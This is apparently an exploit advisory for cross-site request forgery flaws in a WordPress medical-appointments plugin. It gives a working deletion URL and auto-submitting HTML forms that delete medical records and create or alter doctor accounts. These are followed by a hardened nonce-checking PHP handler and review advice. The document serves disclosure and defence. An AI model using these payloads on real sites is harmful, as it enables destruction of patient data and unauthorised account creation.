## https://sploitus.com/exploit?id=WPEX-ID:E0741E2C-C529-4815-8744-16E01CDB0AED
Make a logged in admin open the following URL to make them delete the appointment with ID 1: https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=appointment_delete&id=1

Make a logged in admin open a page with the HTML code below

To make them delete the medical record with ID 1:

```html
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="route_name" value="medical_records_delete"/>
        <input type="text" name="id" value="1">
        <input type="submit" value="submit">
    </form>
</body>
```

To make them create a new doctor:

```html
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="user_email" value="attacker@domain.com">
        <input type="text" name="first_name" value="Attacker">
        <input type="text" name="last_name" value="Via CSRF">
        <input type="text" name="mobile_number" value="1">
        <input type="text" name="gender" value="other">
        <input type="submit" value="submit">
    </form>
</body>
```

To edit an existing doctor, add the ID and the correct email to the code above, e.g.:

```html
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="ID" value="8">
        <input type="text" name="user_email" value="attacker@domain.com">
        <input type="text" name="first_name" value="Attacker">
        <input type="text" name="last_name" value="Via CSRF">
        <input type="text" name="mobile_number" value="1">
        <input type="text" name="gender" value="other">
        <input type="submit" value="submit">
    </form>
</body>
```

(This will change their name, mobile number and gender, and will also reset their specialisation and other fields.)
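The root cause common to every PoC above is that the `ajax_get` / `ajax_post` dispatchers act on a state-changing `route_name` using only the admin's session cookie, with no CSRF token tied to the request. The snippet below is an added illustration of how a WordPress AJAX handler closes that gap; it is not the affected plugin's code. The hook name, the nonce action string `example_appointments_nonce`, the `medical_records_delete` branch's table name and the `example_` function names are assumptions chosen for the example; only the `ajax_post`, `route_name` and `id` parameter names come from the advisory.

```php
<?php
// Added illustration of the missing CSRF protection; not the plugin's own code.
// Hook/function names, the nonce action and the table name are assumptions.

// Hardened dispatcher for admin-ajax.php?action=ajax_post.
// Deliberately NOT registered on wp_ajax_nopriv_*, so anonymous callers never reach it.
add_action( 'wp_ajax_ajax_post', 'example_ajax_post_handler' );

function example_ajax_post_handler() {
    // 1. Anti-CSRF: check_ajax_referer() looks for a nonce in the `_ajax_nonce`
    //    (or `_wpnonce`) request field and, by default, terminates the request
    //    with a -1 response if it is missing or invalid. A cross-site form such
    //    as the PoCs above cannot obtain this value, so the request dies here.
    check_ajax_referer( 'example_appointments_nonce' );

    // 2. Authorisation: an admin being driven through CSRF still passes this
    //    check, which is why the nonce check above is needed in addition to it.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 3. Input hardening: constrain the route to a known set and coerce the id.
    $route = isset( $_POST['route_name'] ) ? sanitize_key( wp_unslash( $_POST['route_name'] ) ) : '';
    $id    = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;

    switch ( $route ) {
        case 'medical_records_delete':
            if ( 0 === $id ) {
                wp_send_json_error( array( 'message' => 'missing id' ), 400 );
            }
            global $wpdb;
            // Assumed custom table; prepared via $wpdb->delete() with a %d format.
            $deleted = $wpdb->delete(
                $wpdb->prefix . 'example_medical_records',
                array( 'id' => $id ),
                array( '%d' )
            );
            wp_send_json_success( array( 'deleted' => (int) $deleted ) );
            break;

        default:
            wp_send_json_error( array( 'message' => 'unknown route' ), 400 );
    }
}

// The legitimate admin UI gets the nonce server-side and sends it with each
// request as `_ajax_nonce`, which is the field check_ajax_referer() reads.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_appointments_nonce' ),
    ) );
} );
```

Two points worth checking when reviewing a plugin for this class of bug: first, that every `wp_ajax_*` callback which writes or deletes data calls `check_ajax_referer()` or `wp_verify_nonce()` before touching the database, not just `current_user_can()`; second, that destructive routes are not reachable via GET at all, since the first PoC above shows an `appointment_delete` triggered by a plain link, which a nonce check would stop but which should not be a GET-mutable operation in the first place.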